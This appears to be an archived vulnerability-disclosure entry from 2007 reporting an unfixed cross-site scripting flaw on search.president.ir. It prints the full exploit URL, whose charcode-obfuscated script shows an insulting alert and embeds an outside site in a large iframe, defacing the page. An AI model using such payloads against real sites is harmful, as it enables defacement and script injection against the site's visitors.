Security researcher sshjason, has submitted on 07/05/2007 a cross-site-scripting (XSS) vulnerability affecting search.president.ir, which at the time of submission ranked 69605 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 07/05/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 07/05/2007 |
Date published: 07/05/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: sshjason |
Domain: search.president.ir |
Category: XSS |
Pagerank: 69605 |
URL: http://search.president.ir/search.php?term=f00z%3Cscript%3Edocument.write(String.fromCharCode(60,115 ,99,114,105,112,116,62,97,108,101,114,116,40,34,65,104,109,97,100,105,110,101,106,97,100,44,32,112,9 7,119,110,51,100,33,32,71,111,32,115,117,99,107,32,109,121,32,46,46,46,46,46,34,41,59,60,47,115,99,1 14,105,112,116,62,60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119 ,46,98,114,101,105,116,98,97,114,116,46,99,111,109,47,97,114,116,105,99,108,101,46,112,104,112,63,10 5,100,61,48,54,49,50,49,49,49,51,48,50,53,55,46,121,112,102,107,122,112,53,98,38,115,104,111,119,95, 97,114,116,105,99,108,101,61,49,34,32,119,105,100,116,104,61,34,49,50,48,48,112,120,34,32,104,101,10 5,103,104,116,61,34,49,48,48,48,112,120,34,62,60,47,105,102,114,97,109,101,62))%3C/script%3E&cs=1&ke yphrase=all&LangID=fa&x=0&y=0 |
Click here to view the mirror
|
|